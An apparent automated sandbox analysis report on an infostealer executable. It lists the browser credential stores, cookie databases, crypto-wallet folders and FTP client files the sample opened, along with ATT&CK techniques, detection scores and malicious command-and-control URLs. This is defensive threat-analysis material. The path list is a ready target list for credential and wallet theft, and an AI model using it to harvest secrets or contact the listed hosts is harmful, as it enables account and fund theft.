              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2310705621.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: k7T6akLcAr.exe PID: 6032, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match, File source: Process Memory Space: k7T6akLcAr.exe PID: 6032, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the count of matched signatures for that technique)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (12); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (851); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label | Link
k7T6akLcAr.exe | 55% | ReversingLabs | Win32.Infostealer.Tinba |
k7T6akLcAr.exe | 57% | Virustotal | | Browse
k7T6akLcAr.exe | 100% | Avira | TR/Crypt.TPM.Gen |
k7T6akLcAr.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
https://lev-tolstoi.com:443/apingNot_NullproductState | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/apiFV | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/pi; | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/$$ | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/api? | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/api9 | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/api3 | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 172.67.157.254 | true | false | | high
cashfuzysao.buzz | unknown | unknown | false | | high
scentniej.buzz | unknown | unknown | false | | high
inherineau.buzz | unknown | unknown | false | | high
prisonyfork.buzz | unknown | unknown | false | | high
rebuildeso.buzz | unknown | unknown | false | | high
appliacnesot.buzz | unknown | unknown | false | | high
hummskitnj.buzz | unknown | unknown | false | | high
mindhandru.buzz | unknown | unknown | false | | high
screwamusresz.buzz | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
https://lev-tolstoi.com/api | false | | high
hummskitnj.buzz | false | | high
mindhandru.buzz | false | | high
prisonyfork.buzz | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRik7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://lev-tolstoi.com/pi;k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://lev-tolstoi.com/k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2283837927.0000000005596000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2284043332.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2261475852.000000000558A000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2260828830.0000000005585000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://store.steampowered.com/privacy_agreement/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYik7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://store.steampowered.com/points/shop/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://ocsp.rootca1.amazontrust.com0:k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&ak7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.ecosia.org/newtab/k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brk7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://store.steampowered.com/privacy_agreement/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lev-tolstoi.com:443/apingNot_NullproductStatek7T6akLcAr.exe, 00000000.00000003.2354242281.0000000000AAB000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://lev-tolstoi.com/apiFVk7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A4D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://lev-tolstoi.com/$$k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctak7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/about/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
